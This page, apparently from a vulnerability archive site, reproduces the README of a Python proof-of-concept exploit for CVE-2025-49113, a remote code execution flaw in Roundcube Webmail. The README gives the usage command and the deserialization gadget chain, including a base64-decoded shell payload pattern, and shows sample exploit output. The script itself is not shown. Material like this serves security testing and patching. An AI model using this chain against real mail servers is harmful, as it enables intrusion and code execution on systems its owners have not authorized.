Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-49113 PoC — Roundcube Webmail 安全漏洞

Source
Associated Vulnerability
Title: Roundcube Webmail 安全漏洞 (CVE-2025-49113)
Description:Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Description
💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
Readme

# CVE-2025-49113 – Roundcube Webmail RCE Exploit (Python PoC)

> **CVE ID:** CVE-2025-49113  
> **Exploit Type:** Remote Code Execution (via PHP Object Injection)  
> **Application:** Roundcube Webmail ≤ 1.5.9 and ≤ 1.6.10  
> **Exploit Language:** Python  
> **Author:** 00xCanelo  
> **Status:** Tested and Working on Vulnerable Roundcube Installations

---

## 📌 Description

This exploit leverages a vulnerability in how Roundcube Webmail handles uploaded image filenames which are unserialized as PHP objects. By crafting a malicious payload that triggers a `Crypt_GPG_Engine` deserialization chain, remote command execution can be achieved **post-authentication**.

This Python PoC mimics the attack chain used by the public PHP exploit, but with cleaner logic, optional logging, and ease of usage in offensive tooling setups.

---

## 🚧 Prerequisites

- Vulnerable Roundcube version (≤1.5.9 or ≤1.6.10)
- Valid user credentials on Roundcube
- Python 3.x environment
- `pip install requests`

---

## 🚀 Exploitation Steps

```bash
python3 CVE-2025-49113.py <target_url> <username> <password> <command>
```

### Example:

```bash
python3 CVE-2025-49113.py https://mail.target.htb/ user@target.htb 'P@ssw0rd123' 'id'
```

---

## 🔐 Vulnerable Chain

The PHP class `Crypt_GPG_Engine` allows setting a `_gpgconf` field, which is then passed to shell execution.

Our payload crafts:

```php
echo "<base64-encoded-cmd>" | base64 -d | sh
```

in `_gpgconf`, which leads to RCE upon deserialization.

---

## 💣 Sample Output

```bash
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
```

---

## 📁 File Structure

```
.
├── CVE-2025-49113.py     # Python PoC script
└── README.md             # This documentation
```

---

## ⚠️ Disclaimer

This code is for **educational and authorized security testing** purposes only. Any misuse of this tool is strictly prohibited. The author is not responsible for any damages caused.

---

## 🧠 References

- https://nvd.nist.gov/vuln/detail/CVE-2025-49113
- https://github.com/roundcube/roundcubemail/issues/9312
- https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →